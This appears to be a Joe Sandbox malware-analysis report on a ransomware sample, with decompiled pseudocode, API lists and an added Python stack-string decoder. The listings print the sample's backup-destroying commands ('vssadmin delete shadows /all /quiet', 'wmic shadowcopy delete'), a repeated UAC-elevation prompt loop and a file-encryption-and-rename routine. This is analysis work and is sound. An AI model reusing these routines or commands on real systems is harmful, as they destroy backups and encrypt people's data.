                                        				 *(__ecx + 4) = _t62;   // cache the WinINet session handle in the object
                                        				if(_t62 == 0) {
                                        					// Fallback when the preconfigured path fails: INTERNET_OPEN_TYPE_DIRECT (1)
                                        					// with INTERNET_FLAG_ASYNC (0x10000000). _t62 is NULL here, so the proxy
                                        					// name and bypass-list arguments are NULL as well.
                                        					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                        					 *(__ecx + 4) = _t64;
                                        					return _t64;
                                        				}
                                        				return _t62;
                                        			}

                                        Per-statement addresses for the listing above: 0x0f9d7cf8 to 0x0f9d7ee8.

                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                        • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                        • API String ID: 2038078732-2805935662
                                        • Opcode ID: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction ID: 2e06515f8ee9b72de9484f46fa45d8b61185205893f60446f9b794fd3d471f0b
                                        • Opcode Fuzzy Hash: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction Fuzzy Hash: 7E41A8B4811358DEEB21CF919998B9EBFF5BB04748F50819ED5086B201C7F60A89CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 97%
                                        			E0F9D43E0(void* __eflags) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				char _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				char _v120;
                                        				short _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				intOrPtr _v140;
                                        				intOrPtr _v144;
                                        				intOrPtr _v148;
                                        				char _v152;
                                        				short _v156;
                                        				intOrPtr _v160;
                                        				intOrPtr _v164;
                                        				intOrPtr _v168;
                                        				char _v172;
                                        				short* _v176;
                                        				short* _t51;
                                        				WCHAR* _t59;
                                        				void* _t62;
                                        				signed int _t66;
                                        				void* _t69;
                                        
                                        				// E0F9D3B20 is the VerifyVersionInfoW-based OS version check listed under "APIs" below.
                                        				// Both branches assemble stack strings (UTF-16, two characters per DWORD) and leave
                                        				// _t59 pointing at a path fragment under the system directory and _t51 at its arguments.
                                        				if(E0F9D3B20(_t62) == 0) {
                                        					// Older OS: _v172.. = "\cmd.exe", _v84.. = "/c vssadmin delete shadows /all /quiet"
                                        					_v172 = 0x63005c;   // "\c"
                                        					_v168 = 0x64006d;   // "md"
                                        					_v8 = 0;            // terminator of the argument string
                                        					_t59 =  &_v172;     // lpFile tail
                                        					_v164 = 0x65002e;   // ".e"
                                        					_t51 =  &_v84;      // lpParameters
                                        					_v160 = 0x650078;   // "xe"
                                        					_v156 = 0;          // terminator of "\cmd.exe"
                                        					_v84 = 0x63002f;    // "/c"
                                        					_v80 = 0x760020;    // " v"
                                        					_v76 = 0x730073;    // "ss"
                                        					_v72 = 0x640061;    // "ad"
                                        					_v68 = 0x69006d;    // "mi"
                                        					_v64 = 0x20006e;    // "n "
                                        					_v60 = 0x650064;    // "de"
                                        					_v56 = 0x65006c;    // "le"
                                        					_v52 = 0x650074;    // "te"
                                        					_v48 = 0x730020;    // " s"
                                        					_v44 = 0x610068;    // "ha"
                                        					_v40 = 0x6f0064;    // "do"
                                        					_v36 = 0x730077;    // "ws"
                                        					_v32 = 0x2f0020;    // " /"
                                        					_v28 = 0x6c0061;    // "al"
                                        					_v24 = 0x20006c;    // "l "
                                        					_v20 = 0x71002f;    // "/q"
                                        					_v16 = 0x690075;    // "ui"
                                        					_v12 = 0x740065;    // "et"
                                        				} else {
                                        					// Newer OS: _v152.. = "\wbem\wmic.exe", _v120.. = "shadowcopy delete"
                                        					_v152 = 0x77005c;   // "\w"
                                        					_v148 = 0x650062;   // "be"
                                        					_t59 =  &_v152;     // lpFile tail
                                        					_v144 = 0x5c006d;   // "m" followed by a backslash
                                        					_t51 =  &_v120;     // lpParameters
                                        					_v140 = 0x6d0077;   // "wm"
                                        					_v136 = 0x630069;   // "ic"
                                        					_v132 = 0x65002e;   // ".e"
                                        					_v128 = 0x650078;   // "xe"
                                        					_v124 = 0;          // terminator of "\wbem\wmic.exe"
                                        					_v120 = 0x680073;   // "sh"
                                        					_v116 = 0x640061;   // "ad"
                                        					_v112 = 0x77006f;   // "ow"
                                        					_v108 = 0x6f0063;   // "co"
                                        					_v104 = 0x790070;   // "py"
                                        					_v100 = 0x640020;   // " d"
                                        					_v96 = 0x6c0065;    // "el"
                                        					_v92 = 0x740065;    // "et"
                                        					_v88 = 0x65;        // "e" plus terminator
                                        				}
                                        				_v176 = _t51;
                                        				// 0x400 bytes, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40);
                                        				// RWX is unnecessary for a path buffer and is itself a useful detection signal.
                                        				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                        				if(_t69 != 0) {
                                        					GetSystemDirectoryW(_t69, 0x100);   // e.g. C:\Windows\system32
                                        					lstrcatW(_t69, _t59);                // append "\cmd.exe" or "\wbem\wmic.exe"
                                        					// Net effect: delete all Volume Shadow Copies so encrypted files cannot be
                                        					// restored from previous versions. This is the ransomware's pre-encryption step.
                                        					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                        					// Decompiler rendering of the success flag; the 0x20 matches ShellExecuteW's
                                        					// convention that a return value greater than 32 indicates success.
                                        					asm("sbb edi, edi");
                                        					_t66 =  ~0x20;
                                        				} else {
                                        					_t66 = 0;
                                        				}
                                        				VirtualFree(_t69, 0, 0x8000);   // MEM_RELEASE
                                        				return _t66;
                                        			}

                                        Per-statement addresses for E0F9D43E0: 0x0f9d43f6 to 0x0f9d45f5.

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F9D459F
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D45B5
                                        • lstrcatW.KERNEL32(00000000,0063005C), ref: 0F9D45BD
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F9D45D3
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D45E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                        • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                        • API String ID: 2684037697-4098772853
                                        • Opcode ID: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction ID: 3d037ce479e92392a6ff62be71b1d1a21a9f280bc8e3ba4ad5c125b82955ba1c
                                        • Opcode Fuzzy Hash: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction Fuzzy Hash: EE4128B0149380DEE3208F119849B5BBFE6BB81B49F10491CF6985A292C7F6858CCF97
                                        Uniqueness

                                        Uniqueness Score: -1.00%
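The stack-string technique used by every listing on this page (a UTF-16 string assembled two characters per DWORD in `_vN` slots and terminated by a zero slot) can be decoded mechanically from the decompiler output instead of by hand. The following is an added example written for this page, not code from Joe Sandbox or from the sample. It takes the assignments of E0F9D43E0 above as constructed input, lays the slots out at their stack offsets (a larger N is a lower address), and recovers every NUL-terminated run together with the `_vN` name at which it starts, which is the name you then look for in the API call arguments. The same decoder applies unchanged to the User-Agent tail in the first listing and to the wmic/runas strings in E0F9D3BE0.

```python
import re
import struct
from typing import Dict, List, Tuple

ASSIGN_RE = re.compile(r"_v(\d+)\s*=\s*(0x[0-9a-fA-F]+|\d+)\s*;")

# Constructed input: the two branches of E0F9D43E0 exactly as printed on this page.
CMD_BRANCH = """
    _v172 = 0x63005c;
    _v168 = 0x64006d;
    _v8 = 0;
    _v164 = 0x65002e;
    _v160 = 0x650078;
    _v156 = 0;
    _v84 = 0x63002f;
    _v80 = 0x760020;
    _v76 = 0x730073;
    _v72 = 0x640061;
    _v68 = 0x69006d;
    _v64 = 0x20006e;
    _v60 = 0x650064;
    _v56 = 0x65006c;
    _v52 = 0x650074;
    _v48 = 0x730020;
    _v44 = 0x610068;
    _v40 = 0x6f0064;
    _v36 = 0x730077;
    _v32 = 0x2f0020;
    _v28 = 0x6c0061;
    _v24 = 0x20006c;
    _v20 = 0x71002f;
    _v16 = 0x690075;
    _v12 = 0x740065;
"""

WMIC_BRANCH = """
    _v152 = 0x77005c;
    _v148 = 0x650062;
    _v144 = 0x5c006d;
    _v140 = 0x6d0077;
    _v136 = 0x630069;
    _v132 = 0x65002e;
    _v128 = 0x650078;
    _v124 = 0;
    _v120 = 0x680073;
    _v116 = 0x640061;
    _v112 = 0x77006f;
    _v108 = 0x6f0063;
    _v104 = 0x790070;
    _v100 = 0x640020;
    _v96 = 0x6c0065;
    _v92 = 0x740065;
    _v88 = 0x65;
"""


def parse_slots(listing: str) -> Dict[int, int]:
    """Collect '_vN = value;' assignments as {N: 32-bit value}.

    N is the distance below the frame pointer: _v172 sits 172 bytes under
    ebp, _v8 eight bytes under it. A later assignment to the same slot wins,
    which matches program order.
    """
    slots: Dict[int, int] = {}
    for m in ASSIGN_RE.finditer(listing):
        slots[int(m.group(1))] = int(m.group(2), 0) & 0xFFFFFFFF
    return slots


def rebuild_frame(slots: Dict[int, int]) -> Tuple[int, bytes]:
    """Lay the slots out as they sit in memory (little-endian, 4 bytes each).

    Returns (top, frame) where frame[0] corresponds to ebp-top. Slots the
    listing never writes stay zero: an unknown byte must not be allowed to
    join two strings, so zero (a terminator) is the conservative choice.
    """
    top = max(slots)
    frame = bytearray(top)
    for off, val in slots.items():
        pos = top - off
        frame[pos:pos + 4] = struct.pack("<I", val)
    return top, bytes(frame)


def decode_stack_strings(listing: str, min_chars: int = 4) -> List[Tuple[int, str]]:
    """Return [(N, text)] for every NUL-terminated UTF-16LE run of at least
    min_chars characters; N is the _vN slot where the run starts, i.e. the
    name passed by address to the API call in the decompiled code."""
    slots = parse_slots(listing)
    if not slots:
        return []
    top, frame = rebuild_frame(slots)
    found: List[Tuple[int, str]] = []
    i = 0
    while i + 1 < len(frame):
        j = i
        while j + 1 < len(frame) and frame[j:j + 2] != b"\x00\x00":
            j += 2
        if (j - i) // 2 >= min_chars:
            found.append((top - i, frame[i:j].decode("utf-16-le", errors="replace")))
        i = j + 2
    return found


if __name__ == "__main__":
    for name, listing in (("older-OS branch", CMD_BRANCH), ("newer-OS branch", WMIC_BRANCH)):
        for off, text in decode_stack_strings(listing):
            print(f"{name}: &_v{off} -> {text!r}")
```

The offsets in the output line up with the pointers the decompiler takes (`_t59 = &_v172`, `_t51 = &_v84` in one branch, `&_v152` and `&_v120` in the other), which is how you confirm which recovered string is the file path and which is the argument list. Slots such as `_v88 = 0x65` that hold a single character plus its terminator need no special case because the decoder works on the reconstructed bytes rather than on the DWORD values.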

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D3BE0(void* __ecx, void* __edx, void* __eflags) {
                                        				char _v1020;
                                        				short _v1028;
                                        				char _v1532;
                                        				short _v1540;
                                        				intOrPtr _v1548;
                                        				intOrPtr _v1552;
                                        				intOrPtr _v1556;
                                        				intOrPtr _v1560;
                                        				intOrPtr _v1564;
                                        				intOrPtr _v1568;
                                        				intOrPtr _v1572;
                                        				intOrPtr _v1576;
                                        				intOrPtr _v1580;
                                        				intOrPtr _v1584;
                                        				intOrPtr _v1588;
                                        				intOrPtr _v1592;
                                        				intOrPtr _v1596;
                                        				intOrPtr _v1600;
                                        				intOrPtr _v1604;
                                        				intOrPtr _v1608;
                                        				intOrPtr _v1612;
                                        				intOrPtr _v1616;
                                        				short _v1620;
                                        				intOrPtr _v1624;
                                        				intOrPtr _v1628;
                                        				intOrPtr _v1632;
                                        				intOrPtr _v1636;
                                        				intOrPtr _v1640;
                                        				intOrPtr _v1644;
                                        				intOrPtr _v1648;
                                        				intOrPtr _v1652;
                                        				intOrPtr _v1656;
                                        				intOrPtr _v1660;
                                        				intOrPtr _v1664;
                                        				intOrPtr _v1668;
                                        				intOrPtr _v1672;
                                        				short _v1676;
                                        				char _v1680;
                                        				int _t54;
                                        				struct HWND__* _t62;
                                        				long _t66;
                                        				void* _t76;
                                        				void* _t78;
                                        				void* _t80;
                                        
                                        				_t78 = __ecx;   // caller-supplied string, substituted for the "%s" below (what to re-launch)
                                        				_t54 = E0F9D3B20(__edx);   // OS version check (VerifyVersionInfoW, see APIs below)
                                        				if(_t54 != 0) {
                                        					// E0F9D3AA0 builds the SID with sub-authorities 0x20/0x220, i.e. BUILTIN\Administrators
                                        					// (S-1-5-32-544); zero here is treated as "not running elevated".
                                        					_t54 = E0F9D3AA0();
                                        					if(_t54 == 0) {
                                        						// Stack string: "%windir%\system32\wbem\wmic"
                                        						_v1676 = 0x770025;   // "%w"
                                        						_v1672 = 0x6e0069;   // "in"
                                        						_v1668 = 0x690064;   // "di"
                                        						_v1664 = 0x250072;   // "r%"
                                        						_v1660 = 0x73005c;   // "\s"
                                        						_v1656 = 0x730079;   // "ys"
                                        						_v1652 = 0x650074;   // "te"
                                        						_v1648 = 0x33006d;   // "m3"
                                        						_v1644 = 0x5c0032;   // "2" followed by a backslash
                                        						_v1640 = 0x620077;   // "wb"
                                        						_v1636 = 0x6d0065;   // "em"
                                        						_v1632 = 0x77005c;   // "\w"
                                        						_v1628 = 0x69006d;   // "mi"
                                        						_v1624 = 0x63;       // "c" plus terminator
                                        						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                        						// Stack string (wsprintfW format): process call create "cmd /c start %s"
                                        						_v1620 = 0x720070;   // "pr"
                                        						_v1616 = 0x63006f;   // "oc"
                                        						_v1612 = 0x730065;   // "es"
                                        						_v1608 = 0x200073;   // "s "
                                        						_v1604 = 0x610063;   // "ca"
                                        						_v1600 = 0x6c006c;   // "ll"
                                        						_v1596 = 0x630020;   // " c"
                                        						_v1592 = 0x650072;   // "re"
                                        						_v1588 = 0x740061;   // "at"
                                        						_v1584 = 0x200065;   // "e "
                                        						_v1580 = 0x630022;   // quote, "c"
                                        						_v1576 = 0x64006d;   // "md"
                                        						_v1572 = 0x2f0020;   // " /"
                                        						_v1568 = 0x200063;   // "c "
                                        						_v1564 = 0x740073;   // "st"
                                        						_v1560 = 0x720061;   // "ar"
                                        						_v1556 = 0x200074;   // "t "
                                        						_v1552 = 0x730025;   // "%s"
                                        						_v1548 = 0x22;       // closing quote plus terminator
                                        						wsprintfW( &_v1028,  &_v1620, _t78);
                                        						// 0x3d bytes for a SHELLEXECUTEINFOW (sizeof is 0x3c on 32-bit), filled field by field.
                                        						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                        						 *_t76 = 0x3c;                 // cbSize
                                        						 *(_t76 + 4) = 0x40;           // fMask = SEE_MASK_NOCLOSEPROCESS, so hProcess is returned
                                        						_t62 = GetForegroundWindow();
                                        						_t80 = 0;                      // retry counter
                                        						 *(_t76 + 8) = _t62;           // hwnd: owner of the UAC dialog
                                        						// The verb "runas" is written over the now-consumed "%windir%..." buffer.
                                        						_v1680 = 0x750072;             // "ru"
                                        						_v1676 = 0x61006e;             // "na"
                                        						_v1672 = 0x73;                 // "s" plus terminator
                                        						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;   // lpVerb = "runas": request elevation
                                        						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;  // lpFile = expanded wmic path
                                        						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;  // lpParameters = process call create "cmd /c start <_t78>"
                                        						 *(_t76 + 0x18) = 0;           // lpDirectory
                                        						 *(_t76 + 0x1c) = 0;           // nShow = SW_HIDE
                                        						 *(_t76 + 0x20) = 0;           // hInstApp
                                        						// Re-issue the elevation prompt until the user accepts, up to 100 (0x64) times.
                                        						while(1) {
                                        							_t66 = ShellExecuteExW(_t76);
                                        							if(_t66 != 0) {
                                        								break;
                                        							}
                                        							_t80 = _t80 + 1;
                                        							if(_t80 < 0x64) {
                                        								continue;
                                        							}
                                        							// Gave up after 100 refusals: release the struct (_t66 is 0 here) and return.
                                        							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                        							goto L6;
                                        						}
                                        						// Elevated copy launched through WMI: wait on hProcess (+0x38) and exit this instance.
                                        						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                        						CloseHandle( *(_t76 + 0x38));
                                        						ExitProcess(0);
                                        					}
                                        				}
                                        				L6:
                                        				return _t54;
                                        			}

                                        Per-statement addresses for E0F9D3BE0: 0x0f9d3bef to 0x0f9d3e17.

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                          • Part of subcall function 0F9D3AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F9D3C8D
                                        • wsprintfW.USER32 ref: 0F9D3D57
                                        • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F9D3D6B
                                        • GetForegroundWindow.USER32 ref: 0F9D3D80
                                        • ShellExecuteExW.SHELL32(00000000), ref: 0F9D3DE1
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D3DF4
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F9D3E06
                                        • CloseHandle.KERNEL32(?), ref: 0F9D3E0F
                                        • ExitProcess.KERNEL32 ref: 0F9D3E17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                        • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                        • API String ID: 561366689-3790645798
                                        • Opcode ID: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction ID: 1b1e8f97a290841dd6f123cdafe7add18df6feed863d5dc5ad129d7878d62b33
                                        • Opcode Fuzzy Hash: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction Fuzzy Hash: DB516CB0008341DFE3208F51D448B5ABFF9FF84759F104A1DE59886292C7FA91A8CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 78%
                                        			E0F9D35E0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                        				long _v8;
                                        				void* _v12;
                                        				long _v16;
                                        				long _v20;
                                        				void* _v24;
                                        				void* _v28;
                                        				long _v32;
                                        				long _v36;
                                        				void _v40;
                                        				void _v44;
                                        				signed int _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				void* _v60;
                                        				void* _v64;
                                        				void* _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				short _v80;
                                        				int _v84;
                                        				char _v88;
                                        				char _v104;
                                        				char _v108;
                                        				char _v140;
                                        				char _v388;
                                        				void* _t96;
                                        				void* _t97;
                                        				struct HWND__* _t99;
                                        				void* _t101;
                                        				void* _t107;
                                        				long _t124;
                                        				long _t125;
                                        				long _t128;
                                        				WCHAR* _t145;
                                        				void* _t147;
                                        				void* _t149;
                                        				void* _t151;
                                        				WCHAR* _t162;
                                        				void* _t163;
                                        				void* _t164;
                                        				void _t165;
                                        				void* _t166;
                                        				long _t168;
                                        				void* _t173;
                                        				void* _t175;
                                        				void* _t176;
                                        				void* _t177;
                                        
                                        				_t145 = __ecx;
                                        				_t166 = __edx;
                                        				_v52 = __ecx;
                                        				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
                                        				_v20 = 0;
                                        				_v32 = 0;
                                        				_t151 = _t166;
                                        				E0F9D63D0(_t151, 0, 0,  &_v20,  &_v32);
                                        				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                        				_v80 = 0x47002e;
                                        				_v56 = _t162;
                                        				_v76 = 0x430044;
                                        				_v72 = 0x42;
                                        				lstrcpyW(_t162, _t145);
                                        				lstrcatW(_t162,  &_v80);
                                        				asm("movdqa xmm0, [0xf9e04b0]");
                                        				asm("movdqu [ebp-0x88], xmm0");
                                        				_push(_t151);
                                        				asm("movdqa xmm0, [0xf9e04b0]");
                                        				asm("movdqu [ebp-0x78], xmm0");
                                        				_v108 = 0;
                                        				asm("movdqa xmm0, [0xf9e04b0]");
                                        				asm("movdqu [ebp-0x64], xmm0");
                                        				E0F9D82A0( &_v104, 0x10);
                                        				E0F9D82A0( &_v140, 0x20);
                                        				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                        				asm("movdqu xmm0, [ebp-0x88]");
                                        				asm("movdqu [ebx], xmm0");
                                        				asm("movdqu xmm0, [ebp-0x78]");
                                        				_v24 = _t96;
                                        				asm("movdqu [ebx+0x10], xmm0");
                                        				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                        				asm("movdqu xmm0, [ebp-0x64]");
                                        				_t163 = _t97;
                                        				_v60 = _t163;
                                        				asm("movdqu [edi], xmm0");
                                        				_v88 = 0x20;
                                        				_v84 = 0x10;
                                        				_t99 = E0F9D6530(_v20, _v32, _t96,  &_v88, 0x800);
                                        				_t175 = _t173 + 0x18;
                                        				if(_t99 != 0) {
                                        					_t101 = E0F9D6530(_v20, _v32, _t163,  &_v84, 0x800);
                                        					_t176 = _t175 + 0x14;
                                        					if(_t101 != 0) {
                                        						E0F9D83C0( &_v140,  &_v388);
                                        						_t177 = _t176 + 8;
                                        						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                        						_v28 = _t147;
                                        						if(_t147 != 0xffffffff) {
                                        							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
                                        							 *_t164 = 0;
                                        							 *(_t164 + 4) = 0;
                                        							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                        							_t168 = 0;
                                        							_v12 = _t107;
                                        							_v36 = 0;
                                        							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
                                        								_t124 = _v8;
                                        								if(_t124 != 0) {
                                        									_t149 = 0;
                                        									_v64 = 0;
                                        									_t168 =  <  ? 1 : _t168;
                                        									 *_t164 =  *_t164 + _t124;
                                        									asm("adc [edi+0x4], ebx");
                                        									_t125 = _v8;
                                        									_v48 = _t125;
                                        									if((_t125 & 0x0000000f) != 0) {
                                        										do {
                                        											_t125 = _t125 + 1;
                                        										} while ((_t125 & 0x0000000f) != 0);
                                        										_v8 = _t125;
                                        									}
                                        									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
                                        									E0F9D89C0(_t126, _v12, _v48);
                                        									_t128 = _v8;
                                        									_t177 = _t177 + 0xc;
                                        									_v40 = _t128;
                                        									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
                                        										E0F9D3500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
                                        										_t149 = _v64;
                                        										_t177 = _t177 + 0x10;
                                        									}
                                        									VirtualFree(_v68, 0, 0x8000);
                                        									SetFilePointer(_v28,  ~_v48, 0, 1);
                                        									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
                                        										_t168 = 1;
                                        										_v36 = 1;
                                        									}
                                        									VirtualFree(_t149, 0, 0x8000);
                                        									_t147 = _v28;
                                        									if(_t168 == 0) {
                                        										_t107 = _v12;
                                        										continue;
                                        									}
                                        								}
                                        								break;
                                        							}
                                        							VirtualFree(_v12, 0, 0x8000);
                                        							if(_v36 == 0) {
                                        								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
                                        								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
                                        								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
                                        							}
                                        							CloseHandle(_t147);
                                        							_v40 =  *_t164;
                                        							VirtualFree(_t164, 0, 0x8000);
                                        							VirtualFree(_v24, 0, 0x8000);
                                        							VirtualFree(_v60, 0, 0x8000);
                                        							if(_v36 == 0) {
                                        								MoveFileW(_v52, _v56);
                                        							}
                                        							_t165 = _v40;
                                        						} else {
                                        							VirtualFree(_t163, 0, 0x8000);
                                        							VirtualFree(_v24, 0, 0x8000);
                                        							asm("xorps xmm0, xmm0");
                                        							asm("movlpd [ebp-0x28], xmm0");
                                        							_t165 = _v44;
                                        						}
                                        					} else {
                                        						GetLastError();
                                        						asm("xorps xmm0, xmm0");
                                        						asm("movlpd [ebp-0x28], xmm0");
                                        						_t165 = _v44;
                                        					}
                                        				} else {
                                        					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
                                        					asm("xorps xmm0, xmm0");
                                        					asm("movlpd [ebp-0x28], xmm0");
                                        					_t165 = _v44;
                                        				}
                                        				VirtualFree(_v56, 0, 0x8000);
                                        				return _t165;
                                        			}

                                        0x0f9d35eb
                                        0x0f9d35ed
                                        0x0f9d35f1
                                        0x0f9d35ff
                                        0x0f9d3608
                                        0x0f9d3613
                                        0x0f9d361f
                                        0x0f9d3621
                                        0x0f9d363c
                                        0x0f9d363e
